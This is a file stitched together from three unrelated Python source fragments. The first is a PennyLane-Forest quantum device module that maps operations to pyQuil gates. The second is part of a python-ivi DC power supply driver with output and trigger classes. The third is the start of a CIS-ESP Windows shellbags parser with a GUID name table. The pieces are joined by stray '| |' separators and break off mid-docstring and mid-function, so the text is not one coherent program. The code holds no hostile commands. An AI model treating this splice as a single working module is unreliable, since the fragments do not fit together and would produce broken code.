.. currentmodule:: pennylane_forest.device
This module contains a base class for constructing Forest devices for PennyLane,
as well as some auxiliary functions for converting PennyLane supported operations
(such as ``BasisState``, ``Rot``) to the equivalent pyQuil operations.
This class provides all the boilerplate for supporting Forest devices on PennyLane.
Auxiliary functions
-------------------
.. autosummary::
basis_state
rotation
controlled_phase
Classes
-------
.. autosummary::
ForestDevice
Code details
~~~~~~~~~~~~
"""
import uuid
import numpy as np
from collections import OrderedDict
from pyquil import Program
from pyquil.api._base_connection import ForestConnection
from pyquil.api._config import PyquilConfig
from pyquil.quil import DefGate
from pyquil.gates import X, Y, Z, H, PHASE, RX, RY, RZ, CZ, SWAP, CNOT, S, T, CSWAP, I
# following gates are not supported by PennyLane
from pyquil.gates import CPHASE00, CPHASE01, CPHASE10, CPHASE, CCNOT, ISWAP, PSWAP
from pennylane import QubitDevice, DeviceError
from pennylane.wires import Wires
from ._version import __version__
pyquil_config = PyquilConfig()
def basis_state(par, *wires):
"""Decompose a basis state into a list of PauliX matrices.
Args:
par (array): an array of integers from the set {0,1} representing
the computational basis state
wires (list): list of wires to prepare the basis state on
Returns:
        list: list of PauliX (or identity) operators preparing the basis state on each wire
"""
# pylint: disable=unused-argument
# need the identity here because otherwise only the "p=1" wires register in the circuit
return [X(w) if p == 1 else I(w) for w, p in zip(wires, par)]
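# Example (added for illustration): basis_state([1, 0], 0, 1) yields [X(0), I(1)],
# i.e. qubit 0 is flipped to |1> and qubit 1 is explicitly touched with an identity
# so that it still registers in the program.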
def qubit_unitary(par, *wires):
r"""Define a pyQuil custom unitary quantum operation.
Args:
par (array): a :math:`2^N\times 2^N` unitary matrix
representing a custom quantum operation.
        wires (list): list of wires to apply the unitary to
    Returns:
        list: the custom gate definition followed by the gate applied to the given wires
"""
if par.shape[0] != par.shape[1]:
raise ValueError("Qubit unitary must be a square matrix.")
if not np.allclose(par @ par.conj().T, np.identity(par.shape[0])):
raise ValueError("Qubit unitary matrix must be unitary.")
if par.shape != tuple([2 ** len(wires)] * 2):
raise ValueError("Qubit unitary matrix must be 2^Nx2^N, where N is the number of wires.")
# Get the Quil definition for the new gate
gate_definition = DefGate("U_{}".format(str(uuid.uuid4())[:8]), par)
# Get the gate constructor
gate_constructor = gate_definition.get_constructor()
return [gate_definition, gate_constructor(*wires)]
def rotation(a, b, c, wire):
r"""Arbitrary one-qubit rotation using three Euler angles.
Args:
a, b, c (float): rotation angles
wire (int): wire the rotation acts on
Returns:
        list: RZ and RY rotations implementing the Euler-angle rotation on the given wire
"""
return [RZ(a, wire), RY(b, wire), RZ(c, wire)]
def controlled_phase(phi, q, *wires):
r"""Maps the two-qubit controlled phase gate to the equivalent pyQuil command.
Args:
phi (float): the controlled phase angle
q (int): an integer between 0 and 3 that corresponds to a state
:math:`\{00, 01, 10, 11\}` on which the conditional phase
gets applied
wires (list): list of wires the CPHASE gate acts on
Returns:
pyquil.operation: the corresponding pyQuil operation
"""
# pylint: disable=no-value-for-parameter
if q == 0:
return CPHASE00(phi, *wires)
if q == 1:
return CPHASE01(phi, *wires)
if q == 2:
return CPHASE10(phi, *wires)
return CPHASE(phi, *wires)
# mapping operations supported by PennyLane to the
# corresponding pyQuil operation
pyquil_operation_map = {
"BasisState": basis_state,
"QubitUnitary": qubit_unitary,
"PauliX": X,
"PauliY": Y,
"PauliZ": Z,
"Hadamard": H,
"CNOT": CNOT,
"SWAP": SWAP,
"CZ": CZ,
"PhaseShift": PHASE,
"RX": RX,
"RY": RY,
"RZ": RZ,
"Rot": rotation,
# the following gates are provided by the PL-Forest plugin
"S": S,
"T": T,
"Toffoli": CCNOT,
"CPHASE": controlled_phase,
"CSWAP": CSWAP,
"ISWAP": ISWAP,
"PSWAP": PSWAP,
}
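# Illustrative sketch (added): the device's apply() method resolves each PennyLane
# operation name through this map and calls the entry with the operation's
# parameters followed by the device wire labels. A hypothetical RX(0.3) on wire 0
# therefore becomes the pyQuil gate below; composite entries such as "Rot" return a
# list of pyQuil gates instead.
def _example_operation_lookup():
    return pyquil_operation_map["RX"](0.3, 0)   # pyquil.gates.RX(angle=0.3, qubit=0)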
class ForestDevice(QubitDevice):
r"""Abstract Forest device for PennyLane.
Args:
wires (int or Iterable[Number, str]]): Number of subsystems represented by the device,
or iterable that contains unique labels for the subsystems as numbers (i.e., ``[-1, 0, 2]``)
or strings (``['ancilla', 'q1', 'q2']``).
shots (int): Number of circuit evaluations/random samples used
to estimate expectation values of observables.
For simulator devices, 0 means the exact EV is returned.
"""
pennylane_requires = ">=0.15"
version = __version__
author = "Rigetti Computing Inc."
_operation_map = pyquil_operation_map
_capabilities = {"model": "qubit", "tensor_observables": True}
def __init__(self, wires, shots=1000, **kwargs):
super().__init__(wires, shots)
self.reset()
@staticmethod
def _get_connection(**kwargs):
forest_url = kwargs.get("forest_url", pyquil_config.forest_url)
qvm_url = kwargs.get("qvm_url", pyquil_config.qvm_url)
compiler_url = kwargs.get("compiler_url", pyquil_config.quilc_url)
connection = ForestConnection(
sync_endpoint=qvm_url,
compiler_endpoint=compiler_url,
forest_cloud_endpoint=forest_url,
)
return connection
@property
def program(self):
"""View the last evaluated Quil program"""
return self.prog
def define_wire_map(self, wires):
if hasattr(self, "wiring"):
device_wires = Wires(self.wiring)
else:
# if no wiring given, use consecutive wire labels
device_wires = Wires(range(self.num_wires))
return OrderedDict(zip(wires, device_wires))
def apply(self, operations, **kwargs):
# pylint: disable=attribute-defined-outside-init
rotations = kwargs.get("rotations", [])
# Storing the active wires
self._active_wires = ForestDevice.active_wires(operations + rotations)
# Apply the circuit operations
for i, operation in enumerate(operations):
# map the ops' wires to the wire labels used by the device
device_wires = self.map_wires(operation.wires)
par = operation.parameters
if i > 0 and operation.name in ("QubitStateVector", "BasisState"):
raise DeviceError(
"Operation {} cannot be used after other Operations have already "
"been applied on a {} device.".format(operation.name, self.short_name)
)
self.prog += self._operation_map[operation.name](*par, *device_wires.labels)
self.prog += self.apply_rotations(rotations)
def apply_rotations(self, rotations):
"""Apply the circuit rotations.
This method serves as an auxiliary method to :meth:`~.ForestDevice.apply`.
Args:
rotations (List[pennylane.Operation]): operations that rotate into the
measurement basis
Returns:
pyquil.Program: the pyquil Program that specifies the corresponding rotations
"""
rotation_operations = Program()
for operation in rotations:
# map the ops' wires to the wire labels used by the device
device_wires = self.map_wires(operation.wires)
par = operation.parameters
rotation_operations += self._operation_map[operation.name](*par, *device_wires.labels)
return rotation_operations
def reset(self):
self.prog = Program()
self._active_wires = Wires([])
self._state = None
@property
def operations(self):
return set(self._operation_map.keys())
def mat_vec_product(self, mat, vec, device_wire_labels):
r"""Apply multiplication of a matrix to subsystems of the quantum state.
Args:
mat (array): matrix to multiply
vec (array): state vector to multiply
device_wire_labels (Sequence[int]): labels of device subsystems
Returns:
array: output vector after applying ``mat`` to input ``vec`` on specified subsystems
"""
num_wires = len(device_wire_labels)
if mat.shape != (2 ** num_wires, 2 ** num_wires):
raise ValueError(
f"Please specify a {2**num_wires} x {2**num_wires} matrix for {num_wires} wires."
)
# first, we need to reshape both the matrix and vector
# into blocks of 2x2 matrices, in order to do the higher
# order matrix multiplication
# Reshape the matrix to ``size=[2, 2, 2, ..., 2]``,
# where ``len(size) == 2*len(wires)``
#
# The first half of the dimensions correspond to a
# 'ket' acting on each wire/qubit, while the second
# half of the dimensions correspond to a 'bra' acting
# on each wire/qubit.
#
# E.g., if mat = \sum_{ijkl} (c_{ijkl} |ij><kl|),
# and wires=[0, 1], then
# the reshaped dimensions of mat are such that
# mat[i, j, k, l] == c_{ijkl}.
mat = np.reshape(mat, [2] * len(device_wire_labels) * 2)
# Reshape the state vector to ``size=[2, 2, ..., 2]``,
# where ``len(size) == num_wires``.
# Each wire corresponds to a subsystem.
#
# E.g., if vec = \sum_{ijk}c_{ijk}|ijk>,
# the reshaped dimensions of vec are such that
# vec[i, j, k] == c_{ijk}.
vec = np.reshape(vec, [2] * self.num_wires)
# Calculate the axes on which the matrix multiplication
# takes place. For the state vector, this simply
# corresponds to the requested wires. For the matrix,
# it is the latter half of the dimensions (the 'bra' dimensions).
#
# For example, if num_wires=3 and wires=[2, 0], then
# axes=((2, 3), (2, 0)). This is equivalent to doing
# np.einsum("ijkl,lnk", mat, vec).
axes = (np.arange(len(device_wire_labels), 2 * len(device_wire_labels)), device_wire_labels)
# After the tensor dot operation, the resulting array
# will have shape ``size=[2, 2, ..., 2]``,
# where ``len(size) == num_wires``, corresponding
# to a valid state of the system.
tdot = np.tensordot(mat, vec, axes=axes)
# Tensordot causes the axes given in `wires` to end up in the first positions
# of the resulting tensor. This corresponds to a (partial) transpose of
# the correct output state
# We'll need to invert this permutation to put the indices in the correct place
unused_idxs = [idx for idx in range(self.num_wires) if idx not in device_wire_labels]
perm = device_wire_labels + unused_idxs
# argsort gives the inverse permutation
inv_perm = np.argsort(perm)
state_multi_index = np.transpose(tdot, inv_perm)
return np.reshape(state_multi_index, 2 ** self.num_wires)
def analytic_probability(self, wires=None):
"""Return the (marginal) probability of each computational basis
state from the last | |
occurs, the output protection of the power supply disables the output.
Once the output protection is reset, the power supply resumes generating
a power signal.
Use the Query Output State function to determine if the power supply is in
an over-voltage or over-current state.
""", cls, grp, '4.3.10'))
self._init_outputs()
def _init_outputs(self):
try:
super(Base, self)._init_outputs()
except AttributeError:
pass
self._output_name = list()
self._output_current_limit = list()
self._output_current_limit_behavior = list()
self._output_enabled = list()
self._output_ovp_enabled = list()
self._output_ovp_limit = list()
self._output_voltage_level = list()
for i in range(self._output_count):
self._output_name.append("output%d" % (i+1))
self._output_current_limit.append(0)
self._output_current_limit_behavior.append('regulate')
self._output_enabled.append(False)
self._output_ovp_enabled.append(True)
self._output_ovp_limit.append(0)
self._output_voltage_level.append(0)
self.outputs._set_list(self._output_name)
def _get_output_current_limit(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_current_limit[index]
def _set_output_current_limit(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if value < 0 or value > self._output_spec[index]['current_max']:
raise ivi.OutOfRangeException()
self._output_current_limit[index] = value
def _get_output_current_limit_behavior(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_current_limit_behavior[index]
def _set_output_current_limit_behavior(self, index, value):
index = ivi.get_index(self._output_name, index)
if value not in CurrentLimitBehavior:
raise ivi.ValueNotSupportedException()
self._output_current_limit_behavior[index] = value
def _get_output_enabled(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_enabled[index]
def _set_output_enabled(self, index, value):
index = ivi.get_index(self._output_name, index)
value = bool(value)
self._output_enabled[index] = value
def _get_output_ovp_enabled(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_ovp_enabled[index]
def _set_output_ovp_enabled(self, index, value):
index = ivi.get_index(self._output_name, index)
value = bool(value)
self._output_ovp_enabled[index] = value
def _get_output_ovp_limit(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_ovp_limit[index]
def _set_output_ovp_limit(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
        if self._output_spec[index]['ovp_max'] >= 0:
            if value < 0 or value > self._output_spec[index]['ovp_max']:
                raise ivi.OutOfRangeException()
        else:
            if value > 0 or value < self._output_spec[index]['ovp_max']:
                raise ivi.OutOfRangeException()
self._output_ovp_limit[index] = value
def _get_output_voltage_level(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_voltage_level[index]
def _set_output_voltage_level(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
        if self._output_spec[index]['voltage_max'] >= 0:
            if value < 0 or value > self._output_spec[index]['voltage_max']:
                raise ivi.OutOfRangeException()
        else:
            if value > 0 or value < self._output_spec[index]['voltage_max']:
                raise ivi.OutOfRangeException()
self._output_voltage_level[index] = value
def _get_output_name(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_name[index]
def _output_configure_current_limit(self, index, behavior, limit):
self._set_output_current_limit_behavior(index, behavior)
self._set_output_current_limit(index, limit)
def _output_configure_range(self, index, range_type, range_val):
index = ivi.get_index(self._output_name, index)
if range_type not in RangeType:
raise ivi.ValueNotSupportedException()
if range_type == 'voltage':
t = 0
elif range_type == 'current':
t = 1
k = dcpwr.get_range(self._output_range[index], t, range_val)
if k < 0:
raise ivi.OutOfRangeException()
self._output_spec[index]['voltage_max'] = self._output_range[index][k][0]
self._output_spec[index]['current_max'] = self._output_range[index][k][1]
pass
def _output_configure_ovp(self, index, enabled, limit):
if enabled:
self._set_output_ovp_limit(index, limit)
self._set_output_ovp_enabled(index, enabled)
def _output_query_current_limit_max(self, index, voltage_level):
index = ivi.get_index(self._output_name, index)
if self._output_spec[index]['voltage_max'] >= 0:
if voltage_level < 0 or voltage_level > self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
else:
if voltage_level > 0 or voltage_level < self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
return self._output_spec[index]['current_max']
def _output_query_voltage_level_max(self, index, current_limit):
index = ivi.get_index(self._output_name, index)
        if current_limit < 0 or current_limit > self._output_spec[index]['current_max']:
raise ivi.OutOfRangeException()
return self._output_spec[index]['voltage_max']
def _output_query_output_state(self, index, state):
index = ivi.get_index(self._output_name, index)
if state not in OutputState:
raise ivi.ValueNotSupportedException()
return False
def _output_reset_output_protection(self, index):
pass
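# Illustrative sketch (added): the helpers above are normally reached through the
# ``outputs[]`` repeated capability of a concrete driver, but their signatures can
# be exercised directly. ``dev`` is a hypothetical instrument instance and the
# numeric limits are made up; they must fall inside the driver's output spec.
def _example_configure_output(dev):
    dev._set_output_voltage_level(0, 3.3)                    # volts
    dev._output_configure_current_limit(0, 'regulate', 0.5)  # behavior, amps
    dev._output_configure_ovp(0, True, 3.6)                  # enable OVP at 3.6 V
    dev._set_output_enabled(0, True)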
class Trigger(ivi.IviContainer):
"Extension IVI methods for power supplies supporting trigger based output changes"
def __init__(self, *args, **kwargs):
super(Trigger, self).__init__(*args, **kwargs)
cls = 'IviDCPwr'
grp = 'Trigger'
ivi.add_group_capability(self, cls+grp)
self._output_trigger_source = list()
self._output_triggered_current_limit = list()
self._output_triggered_voltage_level = list()
self._add_property('outputs[].trigger_source',
self._get_output_trigger_source,
self._set_output_trigger_source,
None,
ivi.Doc("""
Specifies the trigger source. After an Initiate call, the power supply
waits for a trigger event from the source specified with this attribute.
After a trigger event occurs, the power supply changes the voltage level
to the value of the Triggered Voltage Level attribute and the current
limit to the value of the Triggered Current Limit attribute.
""", cls, grp, '5.2.1'))
self._add_property('outputs[].triggered_current_limit',
self._get_output_triggered_current_limit,
self._set_output_triggered_current_limit,
None,
ivi.Doc("""
Specifies the value to which the power supply sets the current limit after
a trigger event occurs. The units are Amps.
After an Initiate call, the power supply waits for a trigger event from
the source specified with the Trigger Source attribute. After a trigger
event occurs, the power supply sets the current limit to the value of this
attribute.
After a trigger occurs, the value of the Current Limit attribute reflects
the new value to which the current limit has been set.
""", cls, grp, '5.2.2'))
self._add_property('outputs[].triggered_voltage_level',
self._get_output_triggered_voltage_level,
self._set_output_triggered_voltage_level,
None,
ivi.Doc("""
Specifies the value to which the power supply sets the voltage level
after a trigger event occurs. The units are Volts.
After an Initiate call, the power supply waits for a trigger event from
the source specified with the Trigger Source attribute. After a trigger
event occurs, the power supply sets the voltage level to the value of this
attribute.
After a trigger occurs, the value of the Voltage Level attribute reflects
the new value to which the voltage level has been set.
""", cls, grp, '5.2.3'))
self._add_method('trigger.abort',
self._trigger_abort,
ivi.Doc("""
If the power supply is currently waiting for a trigger to change the
output signal, this function returns the power supply to the ignore
triggers state.
If the power supply is not waiting for a trigger, this function does
nothing and returns Success.
""", cls, grp, '5.3.1'))
self._add_method('trigger.initiate',
self._trigger_initiate,
ivi.Doc("""
If the power supply is not currently waiting for a trigger, this function
causes the power supply to wait for a trigger.
If the power supply is already waiting for a trigger, this function does
nothing and returns Success.
""", cls, grp, '5.3.5'))
def _init_outputs(self):
try:
super(Trigger, self)._init_outputs()
except AttributeError:
pass
self._output_trigger_source = list()
self._output_triggered_current_limit = list()
self._output_triggered_voltage_level = list()
for i in range(self._output_count):
self._output_trigger_source.append('')
self._output_triggered_current_limit.append(0)
self._output_triggered_voltage_level.append(0)
def _get_output_trigger_source(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_trigger_source[index]
def _set_output_trigger_source(self, index, value):
index = ivi.get_index(self._output_name, index)
value = str(value)
self._output_trigger_source[index] = value
def _get_output_triggered_current_limit(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_triggered_current_limit[index]
def _set_output_triggered_current_limit(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if value < 0 or value > self._output_spec[index]['current_max']:
raise ivi.OutOfRangeException()
self._output_triggered_current_limit[index] = value
def _get_output_triggered_voltage_level(self, index):
index = ivi.get_index(self._output_name, index)
return self._output_triggered_voltage_level[index]
def _set_output_triggered_voltage_level(self, index, value):
index = ivi.get_index(self._output_name, index)
value = float(value)
if self._output_spec[index]['voltage_max'] >= 0:
if value < 0 or value > self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
else:
if value > 0 or value < self._output_spec[index]['voltage_max']:
raise ivi.OutOfRangeException()
self._output_triggered_voltage_level[index] = value
def _trigger_abort(self):
pass
def _trigger_initiate(self):
pass
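# Illustrative usage sketch (not part of the library code): how a consumer of a
# concrete IviDCPwr driver mixing in Trigger would typically use the properties
# and methods registered above. "psu" is an assumed driver instance.
#
#     psu.outputs[0].trigger_source = 'external'
#     psu.outputs[0].triggered_voltage_level = 5.0   # Volts applied after the trigger
#     psu.outputs[0].triggered_current_limit = 1.0   # Amps applied after the trigger
#     psu.trigger.initiate()                         # arm and wait for the trigger event
#     # ... later, to stop waiting without changing the output:
#     psu.trigger.abort()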
class SoftwareTrigger(ivi.IviContainer):
"Extension IVI methods for power supplies supporting software triggering"
def __init__(self, *args, **kwargs):
super(SoftwareTrigger, self).__init__(*args, **kwargs)
cls = 'IviDCPwr'
grp = 'SoftwareTrigger'
ivi.add_group_capability(self, cls+grp)
self._add_method('send_software_trigger',
self._send_software_trigger,
ivi.Doc("""
This function sends a software-generated trigger to the instrument. It is
only applicable for instruments using interfaces or protocols which
support an explicit trigger function. For example, with GPIB this function
could send a group execute trigger to the instrument. Other
implementations might send a ``*TRG`` command.
Since instruments interpret a software-generated trigger in a wide variety
of ways, the precise response of the instrument to this trigger is not
defined. Note that SCPI details a possible implementation.
This function should not use resources which are potentially shared by
other devices (for example, the VXI trigger lines). Use of such shared
resources may have undesirable effects on other devices.
This function should not check the instrument status. Typically, the
end-user calls this function only in a sequence of calls to other
low-level driver functions. The sequence performs one operation. The
end-user uses the low-level functions to optimize one or more aspects of
interaction with the instrument. To check the instrument status, call the
appropriate error query function at the conclusion of the sequence.
The trigger source attribute must accept Software Trigger as a valid
setting for this function to work. If the trigger source is not set to
Software Trigger, this function does nothing and returns the error Trigger
Not Software.
""", cls, grp, '6.2.1', 'send_software_trigger'))
def _send_software_trigger(self):
pass
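# Minimal sketch (an assumption, not the actual implementation of any driver): a
# concrete SCPI-based driver overriding _send_software_trigger might simply issue
# "*TRG", with _write() and _driver_operation_simulate assumed to be provided by
# the concrete driver base class:
#
#     class MyPsu(SoftwareTrigger, ...):
#         def _send_software_trigger(self):
#             if not self._driver_operation_simulate:
#                 self._write("*TRG")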
class Measurement(ivi.IviContainer):
"Extension IVI methods for power supplies supporting measurement of | |
#Copyright 2014 Center for Internet Security - Computer Emergency Response Team (CIS-CERT)
#This is part of the CIS Enumeration and Scanning Program (CIS-ESP)
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
#This is a modified version of shellbags.py by Willi Ballenthin
#Willi Ballenthin, <EMAIL>
#Copyright 2011 Willi Ballenthin while at Mandiant
#
#https://github.com/williballenthin/shellbags
#The original file is licensed under the Apache License, Version 2.0
import datetime
from BinaryParser import Block
from BinaryParser import align
from BinaryParser import OverrunBufferException
class SHITEMTYPE:
'''
This is like an enum...
These are the 'supported' SHITEM types
'''
UNKNOWN0 = 0x00
UNKNOWN1 = 0x01
UNKNOWN2 = 0x2E
FILE_ENTRY0 = 0x31
FILE_ENTRY1 = 0x32
FILE_ENTRY2 = 0xB1
FOLDER_ENTRY = 0x1F
VOLUME_NAME = 0x2F
NETWORK_VOLUME_NAME0 = 0x41
NETWORK_VOLUME_NAME1 = 0x42
NETWORK_VOLUME_NAME2 = 0x46
NETWORK_VOLUME_NAME3 = 0x47
NETWORK_SHARE = 0xC3
URI = 0x61
CONTROL_PANEL = 0x71
UNKNOWN3 = 0x74
class SHITEM(Block):
def __init__(self, buf, offset, parent):
super(SHITEM, self).__init__(buf, offset, parent)
self.declare_field("word", "size", 0x0)
self.declare_field("byte", "type", 0x2)
def __unicode__(self):
return u"SHITEM @ %s." % (hex(self.offset()))
def name(self):
return "??"
def m_date(self):
return datetime.datetime.min
def a_date(self):
return datetime.datetime.min
def cr_date(self):
return datetime.datetime.min
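# Illustrative sketch only (hypothetical field layout, not a real SHITEM subtype):
# concrete item types extend SHITEM, declare extra fields relative to the item's
# offset, and override name()/m_date()/etc. where the data allows, e.g.
#
#     class SHITEM_EXAMPLE(SHITEM):
#         def __init__(self, buf, offset, parent):
#             super(SHITEM_EXAMPLE, self).__init__(buf, offset, parent)
#             self.declare_field("word", "flags", 0x3)       # offsets are made up
#             self.declare_field("dword", "example_size", 0x5)
#         def name(self):
#             return "example item"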
known_guids = {
"008ca0b1-55b4-4c56-b8a8-4de4b299d3bE": "Account Pictures",
"00bcfc5a-ed94-4e48-96a1-3f6217f21990": "RoamingTiles",
"00c6d95f-329c-409a-81d7-c46c66ea7f33": "Default Location",
"00f2886f-cd64-4fc9-8ec5-30ef6cdbe8c3": "Scanners and Cameras",
"0139d44e-6afe-49f2-8690-3dafcae6ffb8": "Programs",
"0142e4d0-fb7a-11dc-ba4a-000ffe7ab428": "Biometric Devices",
"018d5c66-4533-4307-9b53-224de2ed1fe6": "OneDrive",
"025a5937-a6be-4686-a844-36fe4bec8b6d": "Power Options",
"031e4825-7b94-4dc3-b131-e946b44c8dd5": "Libraries",
"04731b67-d933-450a-90e6-4acd2e9408fe": "Search Folder",
"0482af6c-08f1-4c34-8c90-e17ec98b1e17": "Public Account Pictures",
"054fae61-4dd8-4787-80b6-090220c4b700": "GameExplorer",
"05d7b0f4-2121-4eff-bf6b-ed3f69b894d9": "Taskbar (NotificationAreaIcons)",
"0762d272-c50a-4bb0-a382-697dcd729b80": "Users",
"087da31b-0dd3-4537-8e23-64a18591f88b": "Windows Security Center",
"0907616e-f5e6-48d8-9d61-a91c3d28106d": "Hyper-V Remote File Browsing",
"0ac0837c-bbf8-452a-850d-79d08e667ca7": "Computer",
"0afaced1-e828-11d1-9187-b532f1e9575d": "Folder Shortcut",
"0b2baaeb-0042-4dca-aa4d-3ee8648d03e5": "Pictures Library",
"0c15d503-d017-47ce-9016-7b3f978721cc": "Portable Device Values",
"0c39a5cf-1a7a-40c8-ba74-8900e6df5fcd": "Recent Items",
"0cd7a5c0-9f37-11ce-ae65-08002b2e1262": "Cabinet File",
"0d4c3db6-03a3-462f-a0e6-08924c41b5d4": "History",
"0df44eaa-ff21-4412-828e-260a8728e7f1": "Taskbar and Start Menu",
"0f214138-b1d3-4a90-bba9-27cbc0c5389a": "Sync Setup",
"11016101-e366-4d22-bc06-4ada335c892b": "Internet Explorer History and Feeds Shell Data Source for Windows Search",
"1206f5f1-0569-412c-8fec-3204630dfb70": "Credential Manager",
"13e7f612-f261-4391-bea2-39df4f3fa311": "Windows Desktop Search",
"15ca69b3-30ee-49c1-ace1-6b5ec372afb5": "Sample Playlists",
"15eae92e-f17a-4431-9f28-805e482dafd4": "Install New Programs ",
"1723d66a-7a12-443e-88c7-05e1bfe79983": "Previous Versions Delegate Folder",
"1777f761-68ad-4d8a-87bd-30b759fa33dd": "Favorites",
"17cd9488-1228-4b2f-88ce-4298e93e0966": "Default Programs",
"18989b1d-99b5-455b-841c-ab7c74e4ddfc": "Videos",
"190337d1-b8ca-4121-a639-6d472d16972a": "Search Results",
"1a6fdba2-f42d-4358-a798-b74d745926c5": "Recorded TV",
"1a9ba3a0-143a-11cf-8350-444553540000": "Shell Favorite Folder",
"1ac14e77-02e7-4e5d-b744-2eb1ae5198b7": "System32",
"1b3ea5dc-b587-4786-b4ef-bd1dc332aeae": "Libraries",
"1cf1260c-4dd0-4ebb-811f-33c572699fde": "Music",
"1d2680c9-0e2a-469d-b787-065558bc7d43": "Fusion Cache",
"1e87508d-89c2-42f0-8a7e-645a0f50ca58": "Applications",
"1f3427c8-5c10-4210-aa03-2ee45287d668": "User Pinned",
"1f43a58c-ea28-43e6-9ec4-34574a16ebb7": "Windows Desktop Search MAPI Namespace Extension Class",
"1f4de370-d627-11d1-ba4f-00a0c91eedba": "Search Results - Computers (Computer Search Results Folder, Network Computers)",
"1fa9085f-25a2-489b-85d4-86326eedcd87": "Manage Wireless Networks",
"208d2c60-3aea-1069-a2d7-08002b30309d": "My Network Places",
"20d04fe0-3aea-1069-a2d8-08002b30309d": "My Computer",
"2112ab0a-c86a-4ffe-a368-0de96e47012e": "Music",
"21ec2020-3aea-1069-a2dd-08002b30309d": "Control Panel",
"2227a280-3aea-1069-a2de-08002b30309d": "Printers",
"22877a6d-37a1-461a-91b0-dbda5aaebc99": "Recent Places",
"2400183a-6185-49fb-a2d8-4a392a602ba3": "Public Videos",
"241d7c96-f8bf-4f85-b01f-e2b043341a4b": "Workspaces Center(Remote Application and Desktop Connections)",
"24d89e24-2f19-4534-9dde-6a6671fbb8fe": "Documents",
"2559a1f0-21d7-11d4-bdaf-00c04f60b9f0": "Search",
"2559a1f1-21d7-11d4-bdaf-00c04f60b9f0": "Help and Support",
"2559a1f2-21d7-11d4-bdaf-00c04f60b9f0": "Windows Security",
"2559a1f3-21d7-11d4-bdaf-00c04f60b9f0": "Run...",
"2559a1f4-21d7-11d4-bdaf-00c04f60b9f0": "Internet",
"2559a1f5-21d7-11d4-bdaf-00c04f60b9f0": "E-mail",
"2559a1f6-21d7-11d4-bdaf-00c04f60b9f0": "OEM link",
"2559a1f7-21d7-11d4-bdaf-00c04f60b9f0": "Set Program Access and Defaults",
"259ef4b1-e6c9-4176-b574-481532c9bce8": "Game Controllers",
"267cf8a9-f4e3-41e6-95b1-af881be130ff": "Location Folder",
"26ee0668-a00a-44d7-9371-beb064c98683": "Control Panel",
"2728520d-1ec8-4c68-a551-316b684c4ea7": "Network Setup Wizard",
"27e2e392-a111-48e0-ab0c-e17705a05f85": "WPD Content Type Folder",
"28803f59-3a75-4058-995f-4ee5503b023c": "Bluetooth Devices",
"289978ac-a101-4341-a817-21eba7fd046d": "Sync Center Conflict Folder",
"289a9a43-be44-4057-a41b-587a76d7e7f9": "Sync Results",
"289af617-1cc3-42a6-926c-e6a863f0e3ba": "DLNA Media Servers Data Source",
"292108be-88ab-4f33-9a26-7748e62e37ad": "Videos library",
"2965e715-eb66-4719-b53f-1672673bbefa": "Results Folder",
"2a00375e-224c-49de-b8d1-440df7ef3ddc": "LocalizedResourcesDir",
"2b0f765d-c0e9-4171-908e-08a611b84ff6": "Cookies",
"2c36c0aa-5812-4b87-bfd0-4cd0dfb19b39": "Original Images",
"2e9e59c0-b437-4981-a647-9c34b9b90891": "Sync Setup Folder",
"2f6ce85c-f9ee-43ca-90c7-8a9bd53a2467": "File History Data Source",
"3080f90d-d7ad-11d9-bd98-0000947b0257": "Show Desktop",
"3080f90e-d7ad-11d9-bd98-0000947b0257": "Window Switcher",
"3214fab5-9757-4298-bb61-92a9deaa44ff": "Public Music",
"323ca680-c24d-4099-b94d-446dd2d7249e": "Common Places",
"328b0346-7eaf-4bbe-a479-7cb88a095f5b": "Layout Folder",
"335a31dd-f04b-4d76-a925-d6b47cf360df": "Backup and Restore Center",
"339719b5-8c47-4894-94c2-d8f77add44a6": "Pictures",
"33e28130-4e1e-4676-835a-98395c3bc3bb": "Pictures",
"352481e8-33be-4251-ba85-6007caedcf9d": "Temporary Internet Files",
"35786d3c-b075-49b9-88dd-029876e11c01": "Portable Devices",
"36011842-dccc-40fe-aa3d-6177ea401788": "Documents Search Results",
"36eef7db-88ad-4e81-ad49-0e313f0c35f8": "Windows Update",
"374de290-123f-4565-9164-39c4925e467b": "Downloads",
"37efd44d-ef8d-41b1-940d-96973a50e9e0": "Desktop Gadgets",
"38a98528-6cbf-4ca9-8dc0-b1e1d10f7b1b": "Connect To",
"3add1653-eb32-4cb0-bbd7-dfa0abb5acca": "Pictures",
"3c5c43a3-9ce9-4a9b-9699-2ac0cf6cc4bf": "Configure Wireless Network",
"3d644c9b-1fb8-4f30-9b45-f670235f79c0": "Public Downloads",
"3e7efb4c-faf1-453d-89eb-56026875ef90": "Windows Marketplace",
"3eb685db-65f9-4cf6-a03a-e3ef65729f3d": "RoamingAppData",
"3f2a72a7-99fa-4ddb-a5a8-c604edf61d6b": "Music Library",
"3f6bc534-dfa1-4ab4-ae54-ef25a74e0107": "System Restore",
"3f98a740-839c-4af7-8c36-5badfb33d5fd": "Documents library",
"4026492f-2f69-46b8-b9bf-5654fc07e423": "Windows Firewall",
"40419485-c444-4567-851a-2dd7bfa1684d": "Phone and Modem",
"418c8b64-5463-461d-88e0-75e2afa3c6fa": "Explorer Browser Results Folder",
"4234d49b-0245-4df3-b780-3893943456e1": "Applications",
"4336a54d-038b-4685-ab02-99bb52d3fb8b": "Samples",
"43668bf8-c14e-49b2-97c9-747784d784b7": "Sync Center",
